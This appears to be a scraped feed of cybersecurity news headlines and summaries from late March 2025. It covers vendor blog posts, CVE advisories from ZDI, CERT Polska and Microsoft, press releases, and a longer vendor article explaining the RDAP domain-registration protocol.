As artificial intelligence (AI) and quantum technologies reshape the cybersecurity landscape, the ability to identify and understand emerging vulnerabilities remains more critical than ever. AI-driven attacks can automate exploitation at unprecedented speed and scale, while the advent of quantum computing threatens to break traditional cryptographic protections. Understanding how these technologies and nation state actors introduce... View Article The post Testing the Limits: Inside Owl Cyber Defense’s SEER Lab appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/testing-limits-seer-lab/
What Happened Before the Breach?
2025-03-26T13:17:33Z | 1742995053

The energy grid is under attack. Power plants, pipelines, and substations are being compromised, and operations grind to a halt. A cyberattack has struck with a sophisticated, well-planned breach that left critical infrastructure vulnerable. But how did it happen? To understand, we must retrace the steps, from the...

https://www.netscout.com/blog/what-happened-breach-5
LABScon24 Replay | Kryptina RaaS: From Unsellable Cast-off to Enterprise Ransomware
2025-03-26T13:00:16Z | 1742994016

Jim Walter reveals how a recent leak provided insight into how Kryptina RaaS has been adapted for use in enterprise attacks.

https://www.sentinelone.com/labs/labscon24-replay-kryptina-raas-from-unsellable-cast-off-to-enterprise-ransomware/
Palo Alto Networks and NHL Announce Multiyear North American Partnership
2025-03-26T12:30:00Z | 1742992200

Palo Alto Networks named Official Cybersecurity Partner of the NHL NEW YORK and SANTA CLARA, Calif. , March 26, 2025 /PRNewswire/ -- Palo Alto Networks ® (NASDAQ: PANW), the global cybersecurity leader, and the National Hockey League (NHL ® ) announced today a multiyear North American partnership

https://investors.paloaltonetworks.com/news-releases/news-release-details/palo-alto-networks-and-nhl-announce-multiyear-north-american
CodeQLEAKED – Public Secrets Exposure Leads to Supply Chain Attack on GitHub CodeQL
2025-03-26T12:24:28Z | 1742991868

A potential supply chain attack on GitHub CodeQL started simply: a publicly exposed secret, valid for 1.022 seconds at a time. In that second, an attacker could take a series of steps that would allow them to execute code within a GitHub Actions workflow in most repositories using CodeQL, GitHub’s code analysis engine trusted by […] The post CodeQLEAKED – Public Secrets Exposure Leads to Supply Chain Attack on GitHub CodeQL appeared first on Praetorian.

https://www.praetorian.com/blog/codeqleaked-public-secrets-exposure-leads-to-supply-chain-attack-on-github-codeql/
Emissions Transparency: Moving Toward a More Rigorous Verification
2025-03-26T12:00:00Z | 1742990400

https://www.akamai.com/blog/sustainability/2025/mar/moving-toward-a-more-rigorous-verification
App Store Security Myths: Why Enterprises Can’t Solely Rely on Apple and Google for Security Reviews
2025-03-26T11:30:00Z | 1742988600

When enterprise mobility managers, end-user computing (EUC) managers and IT security teams evaluate third-party mobile app risk for business use, a common misconception arises: If an app is available in the Apple App Store or Google Play Store, it must be secure and free of privacy risks. The reality is that Apple and Google app […] The post App Store Security Myths: Why Enterprises Can’t Solely Rely on Apple and Google for Security Reviews appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/03/26/app-store-security-myths-why-enterprises-cant-solely-rely-on-apple-and-google-for-security-reviews/
Empowering Cyber Resilience: Dynamic Deception and Scalability
2025-03-26T11:19:08Z | 1742987948

With cybercrime projected to cost $12 trillion in 2025, regulators are expected to take a more active role in protecting consumer data, pushing organizations to adopt proactive and scalable security strategies that minimize financial and reputational damage (Forrester, 2024). This shift highlights the need for dynamic cybersecurity solutions that can scale effectively across cloud estates, […] The post Empowering Cyber Resilience: Dynamic Deception and Scalability appeared first on CounterCraft.

https://www.countercraftsec.com/blog/empowering-scalable-cybersecurity-for-resilience/
Vulnerability in OXARI ServiceDesk software
2025-03-26T11:00:00Z | 1742986800

Incorrect Authorization vulnerability (CVE-2025-1542) has been found in Infonet Projekt SA OXARI ServiceDesk software.

https://cert.pl/en/posts/2025/03/CVE-2025-1542/
High Threat Security Alert (A25-03-22): Vulnerability in Google Chrome
2025-03-26T04:00:00Z | 1742961600

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-03-23): Vulnerability in VMware Tools
2025-03-26T04:00:00Z | 1742961600

VMware has published a security advisory to address a vulnerability in VMware Tools.

https://www.govcert.gov.hk/en/alerts_detail.php
The Shelby Strategy
2025-03-26T00:00:00Z | 1742947200

An analysis of REF8685's abuse of GitHub for C2 to evade defenses.

https://www.elastic.co/security-labs/the-shelby-strategy
Security Advisory - Authentication Bypass Vulnerability in Huawei PC Products
2025-03-26T00:00:00Z | 1742947200

//www.huawei.com/en/psirt/security-advisories/2025/huawei-sa-20250325-01-pc-en
2025-012: Critical Vulnerabilities in Kubernetes Ingress-NGINX
2025-03-25T19:54:08Z | 1742932448

On March 24, 2025, Wiz Research disclosed a set of critical Remote Code Execution vulnerabilities in the Ingress-NGINX Controller for Kubernetes. The vulnerabilities CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, and CVE-2025-1974 can be exploited to gain full cluster access, resulting in a complete compromise of the environment. The vulnerabilities affect a widely used component in Kubernetes environments responsible for routing external traffic to internal services. Clusters with publicly exposed admission webhooks are at immediate risk.

https://cert.europa.eu/publications/security-advisories/2025-012/
Understanding RDAP: The Future of Domain Registration Data Access
2025-03-25T19:37:12Z | 1742931432

The domain name system (DNS) is an essential component of the internet, allowing users to access websites using human-readable domain names instead of complex IP addresses. Behind every domain name is registration data that contains vital information about domain ownership and administrative contacts. For decades, the WHOIS protocol served as the primary means of accessing domain registration data. However, WHOIS had significant limitations, including inconsistent data formats, security vulnerabilities, and a lack of access control. To address these challenges, the Internet Engineering Task Force (IETF) developed the Registration Data Access Protocol (RDAP) as a modern replacement for WHOIS. In this article, we’ll explore what RDAP is, why it’s important, and how companies like HYAS Insight are leveraging it alongside exclusive infrastructure intelligence data to strengthen cybersecurity efforts. What is RDAP? RDAP was introduced by the IETF in 2015 (RFC 7480–7484) as a modern replacement for WHOIS. ICANN required all gTLD registries and registrars to implement RDAP by August 26, 2019. WHOIS was fully sunsetted on January 28, 2025, making RDAP the sole protocol for domain registration data access. Unlike WHOIS, which delivers plain-text responses with little uniformity, RDAP uses a standardized RESTful API format, making it easier for systems and applications to integrate with domain registration data services. Key Benefits of RDAP RDAP offers several advantages over WHOIS, making it the preferred protocol for domain registration data access: 1. Standardized Data Access WHOIS lacks a consistent data structure, with different registries and registrars presenting data in varied formats. RDAP introduces uniform JSON-based responses, ensuring that data retrieval is consistent and machine-readable across all providers. 2. Enhanced Security and Authentication WHOIS allows unrestricted public access to domain registration data, which poses privacy and security risks. RDAP supports:• Secure HTTPS connections to protect data integrity.• Authentication mechanisms to control who can access specific data.• Role-based access control, allowing registrars and registries to differentiate between public and restricted information. 3. Internationalization Support With the growth of Internationalized Domain Names (IDNs), RDAP provides full Unicode support, making it easier to retrieve registration data for domains using non-Latin scripts, such as Arabic, Chinese, or Cyrillic. 4. Differentiated Access Levels RDAP enables tiered access, allowing registrars and registries to control who can access specific registration data. However, in practice, most WHOIS data remains redacted for privacy reasons, and access to additional data depends on individual registry and registrar policies. The Implementation of RDAP To ensure a smooth transition from WHOIS, ICANN has mandated that all generic top-level domain (gTLD) registries and registrars implement RDAP. The deadline for RDAP implementation was August 26, 2019, after which all accredited registries and registrars were required to provide RDAP services in compliance with ICANN’s specifications. ICANN also developed the gTLD RDAP Profile, which provides technical instructions for registries and registrars to ensure consistent implementation. This profile aligns with the Temporary Specification for gTLD Registration Data, ensuring compliance with GDPR and other data protection regulations. Why is RDAP Important? The introduction of RDAP is a significant step forward in enhancing security, privacy, and transparency in domain registration data access. Here’s why RDAP matters: 1. Strengthening Cybersecurity Cybercriminals frequently exploit domain registration data for fraudulent activities, including phishing, malware distribution, and brand impersonation. RDAP enables cybersecurity professionals to access structured and authenticated registration data, aiding in threat intelligence and incident response. 2. Preventing Abuse and Fraud The lack of access control in WHOIS made it easy for spammers and bad actors to harvest domain registration data for malicious purposes. With RDAP’s authentication and differentiated access features, sensitive domain ownership information can be protected from misuse. 3. Improving Transparency While Ensuring Privacy Privacy laws like the General Data Protection Regulation (GDPR) necessitated changes in how domain registration data is accessed. RDAP ensures compliance with these regulations while still allowing legitimate stakeholders, such as law enforcement agencies and security firms, to obtain necessary domain information under proper authorization. HYAS Insight and Exclusive Infrastructure Intelligence While RDAP significantly improves domain registration data access, cybersecurity firms need deeper intelligence to combat modern cyber threats effectively. This is where HYAS Insight comes in. What is HYAS Insight? HYAS is the world’s premier provider of infrastructure intelligence, enabling organizations worldwide with unparalleled visibility, protection, and the necessary proactive intelligence to address cyber attacks, fraud, and all forms of digital risk. With real-time visibility into adversary infrastructure and their related devices, HYAS Insight allows security teams to track, monitor, and dismantle cyber threats and fraud with unmatched speed and precision. Learn more at hyas.com  The Power of Exclusive Infrastructure Intelligence What sets HYAS Insight apart is its access to exclusive infrastructure intelligence data, which allows organizations to: Gain unparalleled visibility into adversary infrastructure, identifying malicious domains and connections before they become active threats. Enhance threat intelligence and incident response, enabling security teams to investigate, track, and mitigate cyber threats with greater accuracy. Strengthen overall cybersecurity posture, by providing actionable insights that help organizations stay ahead of emerging threats. By leveraging proprietary data sources and advanced analytics, HYAS Insight goes beyond traditional domain intelligence, offering a more comprehensive view of internet-based threats. HYAS Insight’s RDAP Integration As the cybersecurity landscape evolves, organizations must adopt tools that seamlessly integrate with modern data access protocols like RDAP. HYAS Insight proactively made the necessary adjustments to accommodate RDAP, ensuring that users: Benefit from RDAP’s structured and secure data access without disruptions. Leverage RDAP-enhanced domain intelligence within the HYAS platform. With HYAS Insight, security teams don’t need to worry about managing RDAP compliance—the platform automatically integrates RDAP-enabled registration data into its intelligence framework, providing actionable insights without extra effort. Conclusion The Registration Data Access Protocol (RDAP) represents a significant improvement over WHOIS, offering enhanced security, structured data access, and compliance with global privacy laws. By implementing RDAP, the internet community is moving toward a more secure and efficient system for accessing domain registration data. Meanwhile, HYAS Insight takes cybersecurity intelligence a step further by utilizing exclusive infrastructure intelligence data to identify, track, and mitigate cyber threats proactively. With built-in RDAP support, HYAS ensures that organizations can seamlessly access domain registration data without additional configuration or effort. For businesses, cybersecurity professionals, and law enforcement agencies, leveraging RDAP-powered intelligence solutions like HYAS Insight is crucial in the fight against cybercrime. By staying ahead of the curve, organizations can detect threats earlier, prevent attacks, and enhance their overall security posture. Frequently Asked Questions (FAQs) How does RDAP improve upon WHOIS? RDAP offers structured JSON-based responses, secure authentication, and tiered access control, unlike WHOIS, which lacked consistency and security. Do all registries and registrars support RDAP? Yes, ICANN has mandated RDAP implementation for all gTLD registries and registrars as of August 2019. Why is RDAP important for cybersecurity? RDAP enables secure and structured access to domain registration data, helping cybersecurity professionals track threat actors and prevent fraud. How does HYAS Insight use RDAP? HYAS Insight integrates RDAP with exclusive infrastructure intelligence data to provide enhanced threat detection and domain intelligence. Does HYAS Insight require additional setup for RDAP? No, HYAS Insight has already integrated RDAP, ensuring seamless access to domain registration data without extra configuration.

https://www.hyas.com/blog/understanding-rdap-the-future-of-domain-registration-data-access
Top 10 API Security Testing Tools for Mobile Apps | Appknox
2025-03-25T18:28:54Z | 1742927334

According to Salt Security's 2024 State of API Security Report, 80% of API attacks attempt to exploit one or more OWASP API Security Top 10 vulnerabilities. Yet, only 58% of organizations prioritize protection against these well-known threats. This gap leaves many businesses exposed to cyber risks that could have been prevented.

https://www.appknox.com/blog/top-api-testing-tools-for-mobile-apps
Delivering resilient connectivity for AI
2025-03-25T15:01:00Z | 1742914860

Cisco, through its innovations, robust technologies, and partnership with NVIDIA, is helping shape the future of global connectivity in the AI era. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/delivering-resilient-connectivity-for-ai.html
Akamai Wins Best Sales Leadership Development Program from Brandon Hall
2025-03-25T15:00:00Z | 1742914800

Learn how Akamai's award-winning sales leadership development program transforms sales managers into impactful coaches, driving growth and performance.

https://www.akamai.com/blog/news/2025/mar/akamai-wins-best-sales-leadership-brandon-hall
Are Remote Manufacturing Sites Becoming IT Blind Spots?
2025-03-25T14:07:54Z | 1742911674

Everything you touch, from your coffee mug to your keyboard, began as an idea. Manufacturing made it real. But “building reality” requires precision. As digital transformations expanded to manufacturers’ factories, troubleshooting at the network edges became harder without on-site IT support. Delays in diagnosing...

https://www.netscout.com/blog/are-remote-manufacturing-sites-becoming-it-blind-spots
Lessons From the Field: How a Global Motion Control Company Transformed Its Security Operations
2025-03-25T12:49:58Z | 1742906998

What happened when this team found an MDR partner that truly acted as an extension of their team? Managing cybersecurity for a global technology company in the motion and control sector isn’t just about technology, it’s about keeping critical operations running smoothly. This organization, responsible for a wide range of manufacturing processes worldwide, was grappling […] The post Lessons From the Field: How a Global Motion Control Company Transformed Its Security Operations  appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/lessons-from-the-field-how-a-global-motion-control-company-transformed-its-security-operations/
Reduce operational burden and gain efficiency with Logpoint’s latest release
2025-03-25T11:27:11Z | 1742902031

Security Operations Centers (SOCs) and Managed Security Service Providers (MSSPs) are under immense pressure to keep pace with an ever-expanding threat landscape—while also grappling with a persistent cybersecurity skills shortage. According to the European Union Agency for Cybersecurity’s (ENISA) 2024 report, the industry-wide talent gap continues to challenge security teams, leading to inefficiencies and [...] The post Reduce operational burden and gain efficiency with Logpoint’s latest release appeared first on Logpoint.

https://www.logpoint.com/en/blog/reduce-operational-burden-and-gain-efficiency-with-logpoints-latest-release/
Tempted to Classifying APT Actors: Practical Challenges of Attribution in the Case of Lazarus’s Subgroup
2025-03-25T06:00:00Z | 1742882400

*Please note that this article is a tran...

https://blogs.jpcert.or.jp/en/2025/03/classifying-lazaruss-subgroup.html
ZDI-25-176: (0Day) CarlinKit CPC200-CCPA Missing Root of Trust Local Privilege Escalation Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows local attackers to escalate privileges on affected installations of CarlinKit CPC200-CCPA devices. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2762.

http://www.zerodayinitiative.com/advisories/ZDI-25-176/
ZDI-25-177: (0Day) CarlinKit CPC200-CCPA Wireless Hotspot Hard-Coded Credentials Authentication Bypass Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of CarlinKit CPC200-CCPA devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.6. The following CVEs are assigned: CVE-2025-2765.

http://www.zerodayinitiative.com/advisories/ZDI-25-177/
ZDI-25-178: (0Day) CarlinKit CPC200-CCPA update.cgi Improper Verification of Cryptographic Signature Code Execution Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of CarlinKit CPC200-CCPA devices. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 8.0. The following CVEs are assigned: CVE-2025-2764.

http://www.zerodayinitiative.com/advisories/ZDI-25-178/
ZDI-25-179: (0Day) CarlinKit CPC200-CCPA Improper Verification of Cryptographic Signature Code Execution Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows physically present attackers to execute arbitrary code on affected installations of CarlinKit CPC200-CCPA devices. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.8. The following CVEs are assigned: CVE-2025-2763.

http://www.zerodayinitiative.com/advisories/ZDI-25-179/
ZDI-25-180: (0Day) 70mai A510 Use of Default Password Authentication Bypass Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of 70mai A510. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-2766.

http://www.zerodayinitiative.com/advisories/ZDI-25-180/
ZDI-25-181: (0Day) Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Minimal user interaction is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-2767.

http://www.zerodayinitiative.com/advisories/ZDI-25-181/
ZDI-25-182: (0Day) Bdrive NetDrive Uncontrolled Search Path Element Local Privilege Escalation Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows local attackers to escalate privileges on affected installations of Bdrive NetDrive. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2768.

http://www.zerodayinitiative.com/advisories/ZDI-25-182/
ZDI-25-183: (0Day) Bdrive NetDrive Uncontrolled Search Path Element Local Privilege Escalation Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows local attackers to escalate privileges on affected installations of Bdrive NetDrive. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-2769.

http://www.zerodayinitiative.com/advisories/ZDI-25-183/
ZDI-25-184: (0Day) BEC Technologies Multiple Routers Authentication Bypass Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows remote attackers to bypass authentication on affected installations of BEC Technologies routers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-2771.

http://www.zerodayinitiative.com/advisories/ZDI-25-184/
ZDI-25-185: (0Day) BEC Technologies Multiple Routers Insufficiently Protected Credentials Information Disclosure Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of BEC Technologies routers. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-2772.

http://www.zerodayinitiative.com/advisories/ZDI-25-185/
ZDI-25-186: (0Day) BEC Technologies Multiple Routers Cleartext Password Storage Information Disclosure Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows remote attackers to disclose sensitive information on affected installations of BEC Technologies routers. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.9. The following CVEs are assigned: CVE-2025-2770.

http://www.zerodayinitiative.com/advisories/ZDI-25-186/
ZDI-25-187: (0Day) BEC Technologies Multiple Routers sys ping Command Injection Remote Code Execution Vulnerability
2025-03-25T05:00:00Z | 1742878800

This vulnerability allows remote attackers to execute arbitrary code on affected installations of BEC Technologies Multiple Routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-2773.

http://www.zerodayinitiative.com/advisories/ZDI-25-187/
Amid Reports of Worldwide Reboots, GreyNoise Observes In-the-Wild Activity Against DrayTek Routers
2025-03-25T00:00:00Z | 1742860800

GreyNoise is bringing awareness to in-the-wild activity against several known vulnerabilities (CVE-2020-8515, CVE-2021-20123, and CVE-2021-20124) in DrayTek devices.

https://www.greynoise.io/blog/in-the-wild-activity-against-draytek-routers
Converting C++ to Rust: RunSafe’s Journey to Memory Safety
2025-03-24T20:19:31Z | 1742847571

Memory safety vulnerabilities are one of the biggest challenges we face as developers. For years, we’ve relied on C++ as a trusted workhorse for building complex systems. But managing memory manually in C++ brings constant risk of bugs that jeopardize security and stability. As reported by Microsoft, Google, and others, memory safety vulnerabilities account for […] The post Converting C++ to Rust: RunSafe’s Journey to Memory Safety appeared first on RunSafe Security.

https://runsafesecurity.com/blog/convert-c-to-rust/
Using security information and event management tools to manage cyber security risks (ITSM.80.024)
2025-03-24T19:27:26Z | 1742844446

https://cyber.gc.ca/en/guidance/using-security-information-event-management-tools-manage-cyber-security-risks-itsm80024
Detect Identity Compromise with SAML IdP App Canarytokens
2025-03-24T17:21:53Z | 1742836913

At Thinkst, we build tools to make attackers’ lives harder and defenders’ lives easier. Our latest Canarytoken does exactly that—introducing the SAML IdP App Canarytoken (already available on canarytokens.org, but now available on customer Consoles too!) Where our Fake App Canarytokens for iOS and Android detect badness at the device level, SAML IdP App Canarytokens help at the identity level. Organisations rely on Single Sign-On (SSO) to manage authentication across their cloud applications. Attackers know this and target identity providers (IdPs) as a high-value entry point into enterprise environments. By setting up a fake SSO app in your IdP dashboard, you create a high-fidelity tripwire. If an attacker stumbles upon the app and attempts to access it, you immediately receive an alert identifying the compromised account. Early warning of identity compromise helps you react before an attacker can escalate privileges or move laterally within your environment. Creating a SAML IdP App Canarytoken Create a Canarytoken (either on your Console or canarytokens.org) by choosing ‘SAML IdP App’ from the Canarytokens list. Select an app to impersonate from the dropdown. Leave a reasonable comment to remind yourself where you will deploy the Canarytoken (e.g. ‘Fake Salesforce app on Okta’). If you want the […]

https://blog.thinkst.com/2025/03/detect-identity-compromise-with-saml-idp-app-canarytokens.html
The Critical Role of Email Security in Financial Services (BIFS)
2025-03-24T15:19:42Z | 1742829582

The post The Critical Role of Email Security in Financial Services (BIFS) appeared first on Open Systems.

https://www.open-systems.com/blog/critical-role-email-security-financial-services-bifs/
CyberFirst Girls Competition: a proud milestone and exciting future
2025-03-24T15:12:47Z | 1742829167

The future of the CyberFirst Girls Competition and reflecting on brilliant progress.

https://www.ncsc.gov.uk/blog-post/cyberfirst-girls-competition-milestone-future
Cato Networks Earns First-Ever 5-Star Rating in 2025 CRN Partner Program Guide
2025-03-24T13:58:00Z | 1742824680

Today, Cato Networks has been honored by CRN with a 5-Star Award in the 2025 CRN Partner Program Guide. This annual guide is an essential resource for solution providers seeking vendor partner programs that match their business goals and deliver high partner value. This is the first time Cato has received a 5-star rating for... The post Cato Networks Earns First-Ever 5-Star Rating in 2025 CRN Partner Program Guide   appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-earns-5-star-rating-in-2025-crn-partner-program-guide/
Akamai?s Channel-First Strategy: Driving Partner Success in 2025
2025-03-24T13:00:00Z | 1742821200

Customer success is Akamai?s priority ? and our many industry awards highlight how we've empowered our partners to thrive. See what we have planned for 2025.

https://www.akamai.com/blog/partners/2025/mar/akamais-channel-first-strategy-driving-partner-success-2025
Privileged access workstations: introducing our new set of principles
2025-03-24T12:46:38Z | 1742820398

Principles-based guidance for organisations setting up a PAW solution.

https://www.ncsc.gov.uk/blog-post/introducing-new-paws-principles
Operation Skipjack – Part 1
2025-03-24T12:00:23Z | 1742817623

Chapter One  INDOPACOM J3 Admiral Nikki Fury  Camp H. M. Smith Aiea, Hawaii  As I’m walking back to my office in the J3-Operations Directorate, I have a feeling something is not right. Minutes ago, the Chinese Navy and our Reagan Carrier Strike Group traded blows. One of their 5th generation aircraft and a pilot with... View Article The post Operation Skipjack – Part 1 appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/operation-skipjack-part-1/
Vulnerabilities in SIMPLE.ERP software
2025-03-24T11:00:00Z | 1742814000

CERT Polska has received a report about 2 vulnerabilities (CVE-2024-8773 and CVE-2024-8774) found in SIMPLE.ERP software.

https://cert.pl/en/posts/2025/03/CVE-2024-8773/
Detecting and Mitigating an Authorization Bypass Vulnerability in Next.js
2025-03-24T08:00:00Z | 1742803200

https://www.akamai.com/blog/security-research/2025/mar/march-authorization-bypass-critical-nextjs-detections-mitigations
Passkeys: they're not perfect but they're getting better
2025-03-24T07:55:57Z | 1742802957

Passkeys are the future of authentication, offering enhanced security and convenience over passwords, but widespread adoption faces challenges that the NCSC is working to resolve.

https://www.ncsc.gov.uk/blog-post/passkeys-not-perfect-getting-better
Passkeys: the promise of a simpler and safer alternative to passwords
2025-03-24T07:39:00Z | 1742801940

The merits of choosing passkeys over passwords to help keep your online accounts more secure, and explaining how the technology promises to do this

https://www.ncsc.gov.uk/blog-post/passkeys-promise-simpler-alternative-passwords
CVE-2025-24514 Kubernetes: Vulnerability in Kubernetes NGINX Ingress Controller
2025-03-24T07:00:00Z | 1742799600

Ingress Controllers play a critical role within Kubernetes clusters by enabling the functionality of Ingress resources. Azure Kubernetes Service (AKS) is aware of several security vulnerabilities affecting the Kubernetes ingress-nginx controller, including CVE-2025-1098, CVE-2025-1974, CVE-2025-1097, CVE-2025-24514, and CVE-2025-24513. Customers running this controller on their AKS clusters are advised to update to the latest patched versions (v1.11.5 and v1.12.1) to mitigate potential risks.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24514
CVE-2025-1974 Kubernetes: Vulnerability in Kubernetes NGINX Ingress Controller
2025-03-24T07:00:00Z | 1742799600

Ingress Controllers play a critical role within Kubernetes clusters by enabling the functionality of Ingress resources. Azure Kubernetes Service (AKS) is aware of several security vulnerabilities affecting the Kubernetes ingress-nginx controller, including CVE-2025-1098, CVE-2025-1974, CVE-2025-1097, CVE-2025-24514, and CVE-2025-24513. Customers running this controller on their AKS clusters are advised to update to the latest patched versions (v1.11.5 and v1.12.1) to mitigate potential risks.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1974
CVE-2025-1098 Kubernetes: Vulnerability in Kubernetes NGINX Ingress Controller
2025-03-24T07:00:00Z | 1742799600

Ingress Controllers play a critical role within Kubernetes clusters by enabling the functionality of Ingress resources. Azure Kubernetes Service (AKS) is aware of several security vulnerabilities affecting the Kubernetes ingress-nginx controller, including CVE-2025-1098, CVE-2025-1974, CVE-2025-1097, CVE-2025-24514, and CVE-2025-24513. Customers running this controller on their AKS clusters are advised to update to the latest patched versions (v1.11.5 and v1.12.1) to mitigate potential risks.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1098
CVE-2025-1097 Kubernetes: Vulnerability in Kubernetes NGINX Ingress Controller
2025-03-24T07:00:00Z | 1742799600

Ingress Controllers play a critical role within Kubernetes clusters by enabling the functionality of Ingress resources. Azure Kubernetes Service (AKS) is aware of several security vulnerabilities affecting the Kubernetes ingress-nginx controller, including CVE-2025-1098, CVE-2025-1974, CVE-2025-1097, CVE-2025-24514, and CVE-2025-24513. Customers running this controller on their AKS clusters are advised to update to the latest patched versions (v1.11.5 and v1.12.1) to mitigate potential risks.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1097
CVE-2025-24513 Kubernetes: Vulnerability in Kubernetes NGINX Ingress Controller
2025-03-24T07:00:00Z | 1742799600

Ingress Controllers play a critical role within Kubernetes clusters by enabling the functionality of Ingress resources. Azure Kubernetes Service (AKS) is aware of several security vulnerabilities affecting the Kubernetes ingress-nginx controller, including CVE-2025-1098, CVE-2025-1974, CVE-2025-1097, CVE-2025-24514, and CVE-2025-24513. Customers running this controller on their AKS clusters are advised to update to the latest patched versions (v1.11.5 and v1.12.1) to mitigate potential risks.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24513
Security Alert (A25-03-21): Multiple Vulnerabilities in Microsoft Edge
2025-03-24T04:00:00Z | 1742788800

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
SASE as a Journey: Why Single-Vendor Doesn’t Mean Single Project
2025-03-23T09:03:36Z | 1742720616

When IT leaders hear the term “single-vendor SASE,” many assume it implies an immediate, all-encompassing migration—a daunting project requiring the wholesale replacement of existing network and security infrastructure. This misconception can lead to hesitation in embracing a more modern and efficient approach to secure access. The reality, however, is quite different: SASE (Secure Access Service... The post SASE as a Journey: Why Single-Vendor Doesn’t Mean Single Project appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-journey-why-single-vendor-doesnt-mean-single-project/
Securing Vendor Access: The Hidden Vulnerability in Utility Cybersecurity Strategy
2025-03-23T00:39:54Z | 1742690394

In the complex ecosystem of utility operations, one of the most significant yet frequently overlooked risks lies not within your organization's perimeter, but across your expansive network of third-party vendor relationships. Recent security incidents have demonstrated that vendor access points can provide sophisticated threat actors with a path of least resistance into otherwise well-protected environments.

https://www.zentera.net/blog/vendor-access-utility-cybersecurity
What Is SAST? A Guide to Static Application Security Testing
2025-03-22T13:33:25Z | 1742650405

This article is brought to you by Thinus Swart, draft.dev. Static application security testing (SAST) is a method for identifying vulnerabilities in application source code, binaries, or bytecode early in the software development lifecycle (SDLC). By analyzing code before it’s compiled or run, SAST allows developers to catch potential security flaws before they can be […]

https://blog.jetbrains.com/teamcity/2025/03/what-is-sast/
ZTNA Done Right: How to Stop Cyberattacks Without Disrupting Business
2025-03-21T18:50:38Z | 1742583038

The post ZTNA Done Right: How to Stop Cyberattacks Without Disrupting Business appeared first on Open Systems.

https://www.open-systems.com/blog/ztna-done-right-stop-cyberattacks-without-disrupting-business/
Why AI Demands a New Security Playbook
2025-03-21T13:00:00Z | 1742562000

Understand the new AI security threats and how Akamai can help you develop a risk mitigation strategy.

https://www.akamai.com/blog/security/2025/mar/why-ai-demands-a-new-security-playbook
Riasztás Microsoft termékeket érintő sérülékenységekről – 2025. március
2025-03-21T12:47:00Z | 1742561220

Tisztelt Ügyfelünk! A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt. A Microsoft 2025. március havi biztonsági csomagjában összesen 58 különböző biztonsági hibát javított, köztük 7 db nulladik napi (zero-day) sebezhetőséget is (amelyből a támadók […]

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2025-marcius/
Cisco news in 60 seconds: Agentic AI and collaboration
2025-03-21T12:00:00Z | 1742558400

Cisco unveiled its vision for agentic collaboration with AI solutions at Enterprise Connect. Watch to learn more about how AI is shaping the future of collaboration, and how AI is evolving Webex.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m03/cisco-news-in-60-seconds-agentic-ai-and-collaboration.html
TransUnion UK Raises Almost £45,000 for Local Charities
2025-03-21T10:51:19Z | 1742554279

